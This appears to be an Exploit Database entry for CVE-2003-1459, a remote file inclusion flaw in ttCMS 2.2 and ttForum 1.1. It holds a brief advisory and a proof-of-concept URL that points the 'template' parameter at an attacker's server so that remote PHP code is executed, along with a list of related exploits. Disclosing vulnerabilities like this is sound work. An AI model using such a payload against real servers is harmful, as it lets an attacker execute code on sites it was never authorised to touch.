Exploit Database - Logo

ttCMS 2.2 / ttForum 1.1 - 'news.php?template' Remote File Inclusion

EDB-ID: 22577 Author: Charles Reinold Published: 2003-05-09
CVE: CVE-2003-1459 Type: Webapps Platform: PHP
Aliases: N/A Advisory/Source: Link Tags: N/A
E-DB Verified: Verified Exploit: Download Exploit Code Download / View Raw Vulnerable App: N/A
« Previous Exploit Next Exploit » 
source: http://www.securityfocus.com/bid/7542/info

A remote file include vulnerability has been reported for both ttForum and ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'News.php' and 'Install.php' scripts, it is possible for a remote attacker to include a malicious PHP file in a URL.

Successful exploitation will result in the execution of the attacker-supplied PHP instructions with the privileges of the web server.

There are conflicting reports about whether or not this issue exists. The vendor has stated that exploitation of this issue is not possible.


http://www.example.com/ttforum/index.php?action=news;board=1;
template=http://www.yourserver.com/modules/forum/helpadmin;ext=help
« Previous Exploit Next Exploit »

Related Exploits

Trying to match CVEs (1): CVE-2003-1459
Trying to match OSVDBs (1): 54041
Other Possible E-DB Search Terms: ttCMS 2.2 / ttForum 1.1,  ttCMS 2.2,  ttCMS
Date D V Title Author
2003-05-20 Verified ttCMS 2.2/2.3 / ttForum 1.1 - 'index.php' Instant-Messages Preferences SQL InjectionScriptSlave...
2010-04-04 Waiting verification ttCMS 5.0 - Remote File InclusionITSecTeam
2003-05-09 Verified ttCMS 2.2 / ttForum 1.1 - 'install.php?installdir' Remote File InclusionCharles Rei...
2003-05-17 Verified ttCMS 2.2/2.3 - 'header.php' Remote File InclusionScriptSlave...
2007-03-24 Verified ttCMS 4 - 'ez_sql.php?lib_path' Remote File InclusionKacper
Menu